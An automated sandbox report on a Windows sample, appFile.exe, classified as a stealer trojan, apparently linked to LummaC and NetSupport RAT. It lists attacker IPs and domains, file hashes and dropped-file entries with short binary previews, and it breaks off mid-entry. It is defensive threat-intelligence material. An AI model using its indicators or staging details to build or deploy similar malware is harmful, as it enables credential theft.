                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 11m 8s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:50
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:appFile.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winEXE@82/35@6/3
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 66.7%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                • Number of executed functions: 44
                                                                                                • Number of non-executed functions: 45
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7032 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                04:21:03API Interceptor1x Sleep call for process: appFile.exe modified
                                                                                                04:21:28API Interceptor9x Sleep call for process: Ted.com modified
                                                                                                04:21:49API Interceptor7x Sleep call for process: powershell.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                185.161.251.21installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                  172.67.214.186installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                          https://os50-card.ru/50Get hashmaliciousUnknownBrowse
                                                                                                            104.21.94.92ciwa.mp4.htaGet hashmaliciousLummaC, PureLog StealerBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              cegu.shopinstaller_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                              • 185.161.251.21
                                                                                                              klipsyzogey.shopinstaller_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                              • 172.67.214.186
                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.214.186
                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.214.186
                                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.214.186
                                                                                                              walkyvulgari.clickciwa.mp4.htaGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                              • 104.21.94.92

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              CLOUDFLARENETUSFloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.25.41
                                                                                                              5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                              • 172.67.165.185
                                                                                                              0A7XTINw3R.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 104.26.8.44
                                                                                                              RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 104.21.11.101
                                                                                                              LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 172.67.165.185
                                                                                                              K9esyY0r4G.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.67.124
                                                                                                              onaUtwpiyq.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              CAo57G5Cio.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              CLOUDFLARENETUSFloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.25.41
                                                                                                              5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                              • 172.67.165.185
                                                                                                              0A7XTINw3R.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 104.26.8.44
                                                                                                              RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 104.21.11.101
                                                                                                              LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 172.67.165.185
                                                                                                              K9esyY0r4G.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.67.124
                                                                                                              onaUtwpiyq.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              CAo57G5Cio.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              NTLGBdb0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                              • 81.97.105.115
                                                                                                              installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                              • 185.161.251.21
                                                                                                              xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 163.165.65.186
                                                                                                              xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 92.237.44.174
                                                                                                              telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 80.4.135.78
                                                                                                              armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 62.254.229.173
                                                                                                              loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 82.3.236.97
                                                                                                              loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 213.107.138.142
                                                                                                              splarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 82.43.102.253
                                                                                                              jklspc.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 86.21.69.116

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              a0e9f5d64349fb13191bc781f81f42e1FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 172.67.214.186
                                                                                                              • 104.21.94.92
                                                                                                              • 185.161.251.21
                                                                                                              RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.214.186
                                                                                                              • 104.21.94.92
                                                                                                              • 185.161.251.21
                                                                                                              GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.214.186
                                                                                                              • 104.21.94.92
                                                                                                              • 185.161.251.21
                                                                                                              vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 172.67.214.186
                                                                                                              • 104.21.94.92
                                                                                                              • 185.161.251.21
                                                                                                              LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 172.67.214.186
                                                                                                              • 104.21.94.92
                                                                                                              • 185.161.251.21
                                                                                                              onaUtwpiyq.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.214.186
                                                                                                              • 104.21.94.92
                                                                                                              • 185.161.251.21
                                                                                                              CAo57G5Cio.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.214.186
                                                                                                              • 104.21.94.92
                                                                                                              • 185.161.251.21
                                                                                                              fer4JIJGeL.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.214.186
                                                                                                              • 104.21.94.92
                                                                                                              • 185.161.251.21
                                                                                                              AaEBZ7icLd.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.214.186
                                                                                                              • 104.21.94.92
                                                                                                              • 185.161.251.21
                                                                                                              wJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.214.186
                                                                                                              • 104.21.94.92
                                                                                                              • 185.161.251.21

                                                                                                              Dropped Files

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              C:\Users\user\AppData\Local\Temp\723356\Ted.comFloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                  skript.batGet hashmaliciousVidarBrowse
                                                                                                                    din.exeGet hashmaliciousVidarBrowse
                                                                                                                      yoda.exeGet hashmaliciousVidarBrowse
                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                          script.ps1Get hashmaliciousVidarBrowse
                                                                                                                            installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                Set-up.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):64
                                                                                                                                  Entropy (8bit):1.1510207563435464
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Nlllul9kLZ:NllUG
                                                                                                                                  MD5:087D847469EB88D02E57100D76A2E8E4
                                                                                                                                  SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                                                                                                                  SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                                                                                                                  SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:@...e.................................,..............@..........

                                                                                                                                  C:\Users\user\AppData\Local\Temp\41b5d0bf

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe
                                                                                                                                  File Type:PNG image data, 2032 x 4684, 8-bit/color RGB, non-interlaced
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):7043853
                                                                                                                                  Entropy (8bit):7.998562535252469
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:196608:jzqqLRn623k+aKXkb4M5mXeHe1djFWgyq:jeqQLMXkbyXe+1djFiq
                                                                                                                                  MD5:667C9BCB2BC991D875DB198CCD2FB30C
                                                                                                                                  SHA1:67703DD819A60A8E46023967573DCD6008FBAA8A
                                                                                                                                  SHA-256:381D8954975FA48B4A07624C65DE7A29BBF7DDFD0B6DFB68AAC312C7E82EC526
                                                                                                                                  SHA-512:470CAC2E53058051C8CE3BA05D79C7362B717204BC7475FFA9B674AC003E65525FC366DF94EAEE9B73467233E1BAB0510A92F22941C2382767A16F28DBE3D332
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.PNG........IHDR.......L......E5... .IDATx..9.$G.....32g..X.w.tvA&P..(y.M.....r7.*Q.r.ke..*...0...3...>Vk.$.........33.##3#3.......p......./?BD.`n..DDDD\.._@...c...10.0...G.<n.E~.9./...q|J..P...59.... O.3..@...0..)....!.=..).s{v.....4MC..Oi...]J.."g.R......m....1..RJ...n..)..+..B....B...{(.T...6-9.....Pkp...MKn#...m/dx..v....M.l?""..#.."v...C.|....c..H>c.].H..M.|B57.|..)B.d.m.........;f..gg0&....n.c....0.4..6.~.T7........+:..../_..DDD.E....x...C..cL................3.y(;....)k......|;..b.cz.....y.o..l.....Y.&n.....g7.g...Rx!.....u].5...m...#...@...|....P.1....Z.M.....6...n$D.......?......q-....C....sI>...q/....G.0 ..(?4.....F....H..%..A......(..g;$_H..7`. D.......B........P..a./].o.$..I~w.D...!.._b.I..5...^)....X......k..|V.NB\.<<D..q...W$k.>..@..^..}p-..=.....k...........h.nB~W.3...r..................|.f....S....ew./.d....T..I..W.Q~.]1.O..:...|)....'V.k_.1...F.1..7l$D.......V...m.9..B\.<h.....?...<n.Q>.d.....<.T.o"..[7...H..S.._.S..N-.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\723356\F

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):453416
                                                                                                                                  Entropy (8bit):7.999579606696287
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:12288:NG1jlUuwxzjsWqcb3es4HEh7KCQILlgDRsEl:M7ZOzGcjerHEh7KCQugDRs2
                                                                                                                                  MD5:EB3780DC43C06E680BBD8A3E8AEB1294
                                                                                                                                  SHA1:957FE120412423C43B417C87573644960CF20120
                                                                                                                                  SHA-256:46E48F215E9D1AD1B1FDCD3CC8BF520153D9A6B5E015DBA87FA9736CDAA62374
                                                                                                                                  SHA-512:BEEB845BDC4900B17FB782977DFD4F00F83DBE8B40C78BA30474691D2020093B9BC3AF4A27EE54791DEB4C0C34701251A6A01A99AA9828890433B22FC3FEFBD4
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:...{.b .r%^2( M...K{.S..;..4..N..i8.U_.....A.$3.9...yg.&|O="A....pG..z.......X....h..L..9..H...5.@.\q"1.l.!.....Y1@.{.$K...P.....u?.4X.q..)*+*....J...._..zo<t..... .bx.D.... ..l.*.wT....$.}5..9.\)..E"IK....`..{P.z.J.kT#...~....b.U,w..9R3..eb..o.;8...&.C..(.,...is.u.kB.. ..4nG.y.gS..:/.4....."G6.......K..2..R..AJ..|.8...9...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....D.F.'.F...h..............V..{....V..{...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.P..,P..Myn.2..t.W....V`.........>.V...h...V..{...m.........8.5...x..2).U.j....2>..#.~...........i.1.|.X=.h...F,.G.."=.....a2I.v...*.pW.EMcY.P.4..l.}......... ........yd.{..Q.'..E...G.=.R.14kv..J.Hu.E_hNV.)y.lL...CM.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\723356\Ted.com

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):947288
                                                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: FloydMounts.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: installer.bat, Detection: malicious, Browse
                                                                                                                                  • Filename: skript.bat, Detection: malicious, Browse
                                                                                                                                  • Filename: din.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: yoda.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: script.ps1, Detection: malicious, Browse
                                                                                                                                  • Filename: installer_1.05_36.4.zip, Detection: malicious, Browse
                                                                                                                                  • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Beatles

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):99328
                                                                                                                                  Entropy (8bit):6.56398211397253
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:1UkBJR8CThpmESv+AqVnBypIbv18mLthfhn6:1UkB0CThp6vmVnjphfhn6
                                                                                                                                  MD5:641F3A5E2CEC2B07A273E98EBFE13F37
                                                                                                                                  SHA1:13B1EF129E89B180BBF4FCDF4B527E6D9E9E9852
                                                                                                                                  SHA-256:F15C25A5E84B52A82B6D523CB6D8E103EB7E7B20A63B439663324AFE6BCDE4D0
                                                                                                                                  SHA-512:A1AE3911210A5C50C3DF4FDBD4547562ADB63CB990B7A39A9ACB2A36DB6B677F7E676A20FB2ACB8DBB3C1F58EA3944AB2DD825F6C473BEC3A5650312F1DAEEE2
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.....u+Sj)^j....$........;.u..s)....j........;.t.[..._..^.SV..3.9^.u..F$h..I.P....F.YY..u.j.X......^.9^.u,......h.zL.P....F YY..u.9^.t..v......Yj...^ .F..^.P..^...<.....@.....D.....L.....P.....H.....`.....d..........t!9^.t..v....Y9^ t..v ...Y3.@.[W...........t 9^.t..v..y...Y9^ t..v .k...Y...,...)..........9^.t..v..K...Y9^ t..v .=...Y3._^[.U..QQSVW..._..].....j...........u*j.......<.....8..............<.....@....[j...............<...+.M...t<...<...H..8..........E...%....C........<.....@....E...u.]....b......`.....H....u.9.<.....H......]...3._^[..j.X..V..8.....t.P.I...Y..\.....t.P.8...Y..X...^..t.P.&...Y..@M.V..W=....v3.%.@M....T.....t(.N.3.k.d.v.PQ.v.......u..H......@..@M._^.U..QQV..~..u..F..F.j.P.E.P.Z.........v..E.j.j.P.........M...E..F........E....E........E......E.h.zL....E.P.h.....YY....^....3.3....Q..Q..Q..Q..Q..Q..Q..Q f.A$f........T....W....D...;.<...ss....u8V..D.....8..........W..........G...D.....D...;.<...r.^.5..D.....8...............P.d.....D.....D

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Cottages

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):71680
                                                                                                                                  Entropy (8bit):6.671554941457524
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:EUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M267:7nj0nEoXnmowS2u5hVOoQ7t8T67
                                                                                                                                  MD5:9B28BEC970EB44B73103FEA3CD8994A5
                                                                                                                                  SHA1:E702C34A9B1AE810542FCDB4DA25667B56DBCF5E
                                                                                                                                  SHA-256:590BB77FFB5B96228ED3D73DBE8ABE145EC9F6350BF893CDBFE47D7C5E6EC529
                                                                                                                                  SHA-512:4EA6A8A488B24915D53A7E29947CE1C59C12C411AF30194E95D123D94E063F8A7C4F3CA06845494CAF548C99B078FCFC3079B1FCDEDA3BF0676309819B2EA25E
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..5M...5M.]...j.h .I.h.iL.j.....I.j..F=...U..V......I..m...v.......E..Yt.j.V....YY..^]...U...43..E.....SV...E...E..E.U.W.E..u.PQ.M..E.P.]..^...............u..M......Y....w...!].E.P.E.P.E.P.u...l.I.....W...j..E.SP.~.......E.....9].t.j.j..E.P.u...p.I.....#....u..=L.I...M.Q.Q...B.M..4...Y........9].].tE.E..t>3...t8.E.PV.u.....I..........M...A.PQj.j.S..x.I.........F;u.r..u...p.Vj...t.I.P..p.I....}.........u..G.f.w.P.u...L.I.P..P.I...tl.u..e......F....F..G....G...G.PWj.j.S..x.I...t=.E....@.E....r.u.j.Sj.V..|.I...t.V.E.P.u.....I...t..E.....].u..}...=x.I.t..u.j...t.I.P...t.Vj...t.I.P...t.Sj...t.I.P..E..t.Pj...t.I.P..E._^[....U...43..E.....SV...E...E..E.U.W.E..u.PQ.M..E.P.]..5...............u..M.....Y....w...!].E.P.E.P.E.P.u...l.I.....W...j..E.SP.U.......E.....9].t.j.j..E.P.u...p.I.....#....u..=L.I...M.Q.Q...B.M......Y........9].].tE.E..t>3...t8.E.PV.u.....I..........M...A.PQj.j.S..x.I.........F;u.r..u...p.Vj...t.I.P..p.I....}.........u..G.f.w.P.u...L.I.P..P.I...tl.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Gen

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):71680
                                                                                                                                  Entropy (8bit):6.68378771516787
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:VW8/uC6LdTmHwANUQlHS3cctlxWboHdMJ3RraSXL21rKL:edTmRxlHS3NxrHSBRtNL
                                                                                                                                  MD5:185C43D0D2A11EF533DBC007F2E73518
                                                                                                                                  SHA1:DAC6544FEA6AF03F69642CD5C31E7055CCC39726
                                                                                                                                  SHA-256:2C1D1385AF354ECBC56570BFE3B5DD0B1A8A25F3C75A6D04B6AC1BE7733F674C
                                                                                                                                  SHA-512:067444349474CCB2993A62DB95E2136A386DC16C68ADEBBDAAE13034237339D886BD38CC9A2E69EB6DD5C9F8F40EFA21244F32C9F7B0104C574267BF38B2EDA2
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:....._ ..w/..U...... ........... ....=...../ ....1..........0.... .............w<............w.................. ......t...............c....._ ..w/..U...... ........... ....=...../ .........,......0...................w.....................o..........( ..........) ....R..............w........A......3.......................................FD...................f9E.......FD..........j.....f;.w`.FD..........Q.....f;........FD...........4.....f;.w*.FD.................f;........FD......t....E....E.@P.u...V.u..u...........k....k.........a............2...;.......&....Fh.......................*.................C...C9.....s[f.;wt.f.8wuO.E......E.......C...C.E......f.;w..[....F..U..M....F..M..L...N.+M.F..U....E.....{.................E.@P....u.V....1L...C..u....u...K.]..........E...t.=....u........u........D...=......9...................s....................E..M.@P.u....V.u.....1L..u...C.%.......................E..M.@P.u....V.u.....1L..u...C.........th....{........

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Guitar

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\appFile.exe
                                                                                                                                  File Type:Microsoft Cabinet archive data, 489587 bytes, 11 files, at 0x2c +A "Cottages" +A "Remarkable", ID 7646, number 1, 29 datablocks, 0x1 compression
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):489587
                                                                                                                                  Entropy (8bit):7.998688003983249
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:12288:/jRbYrqh26J6bPvXiqH6v1jVnonpgqEYVA6rUjTV6Nwx:9Urqh2PLsdsgqEYVDYHx
                                                                                                                                  MD5:6A6C582435956F39C466785F654A2142
                                                                                                                                  SHA1:5148CC44BB5FC0DB20E36E437DDD0013DD510039
                                                                                                                                  SHA-256:6934D989D4EAFC5FF99DCA1A2F85AFDF7A4E58F3761D915DE7BC6A577CE15D07
                                                                                                                                  SHA-512:6A6CF0C06B8635B6DAE681C48CCCD9B57CB4FEEF5E2FF33C535C25766D7F96B018CC9CC35E9E3E9BAB0137EFCCF1964D588AA8BAE24C158AA9CE04068B6DF958
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MSCF....sx......,...................1..................Y.. .Cottages............Y.. .Remarkable...... .....Y.. .Michigan............Y.. .Beatles..@...P.....Y.. .Serious............Y.. .Purpose......(.....Y.. .Harvest.\....D.....Y.. .Portions.....aH.....Y.. .Gen.....a`.....Y.. .Ottawa..$..aP.....Y.. .Tmp.6M..J..CK..xT..8|w.&.....F.F.e....l...l..&h6.ea7...V.n.....%1..p.W..V...}k.....................I7..5..".;g..f...>..<....v...3g..s.n......?..DAuD...."G?S+...7ql..Z.o.qh-.....GO.....=o.[D.....W.4DsUG.>....d..;....Rw... .Cdl.. C.wL.........%...Kq.7..,A..$w............OP.e[.....wH.{...bhcF..#+.n..C.*.....5a@W..#.._.8..\..Jh3n.m..qd.......H .p......45.y....8.........3.oY.;..X.....J.....V%...5h.u.A......4^..J!U2....@.>HRo?.m.....WK-.V...y.".)...F.9bw.Bl@.......j...E{O.U.O.<..x..\..G......T-!#o.....{)...}..+....%.....X..@.....@v......g.r(.y8*.3....v.d.....M...s.{.r...e...`......e.....b.........9..0vS....R....y%...b.{...K..t.tn..K.)....k....m.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Harvest

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):138240
                                                                                                                                  Entropy (8bit):6.714902202170175
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:PUDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAU4Cl:PUDtf0accB3gBmmLsiS+SAhCl
                                                                                                                                  MD5:7BD453CB989233BC60242C2CB7CD1D27
                                                                                                                                  SHA1:D67069DA20FF2D4F3D1BDABA8EA07E3916216EC5
                                                                                                                                  SHA-256:EDB9DA0F217081DCFC28FAD3021C9D48BD06A578121C01AF853CC59E369E61B8
                                                                                                                                  SHA-512:C546E3A31268E0967932232016634D5F7C09C8A1FB1EA52F6715C108C3740D4B1B629F0ADE9038FA1233E735C44B33C1D6856870B1843304EF56482BA435E121
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:B...U..Vj.....D..Y.u........F....F.....^]...U....SVW.}...3.j.A.G.[.M..@.f9X...V......e....d....;.........m.....h.............:.t...uY..:.t...uS..:.........uI..]...;Z.~L..u>..;Z..A.U.B.U...u1.M...d....@...;...H..._^[.....P0.P0.P0.P0.@0..j.h.....:...U..Q...SVW.13.....M.x>..>.+....S..s...0.u......YY..x.~..{..M.;.~.;....._^[.....s.......V..~..t..~..Wu..~.........F.._.N.^.N..y...t.Q......~..F....V...(..j.V.=C..YY..^...U..V..W.F...........}.S..........j.[9_...4..................[.N.....4..._..^]...U..QSVW...G...................u?.u..~....O...j.Y9N..........6........../...O..........._^[.......................M...U..QQV..~..t..y......]..'...E....F.....^..U....SVW..M.h..I......u..F....x........j8..B......$.....'..>B..Y..G..c....O..#......T....F..0...]....v....>..........PV.G(.$.......F....................G(........E..x....y.......>.....U.+w...u......V.........M.......E...P.E.P.W............M..E.P.......j..u..H....a....M......E..@....x..u....~.....t.Q...B..._^

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Michigan

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):109568
                                                                                                                                  Entropy (8bit):6.274615604774731
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:AZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laWA:AK5vPeDkjGgQaE/lO
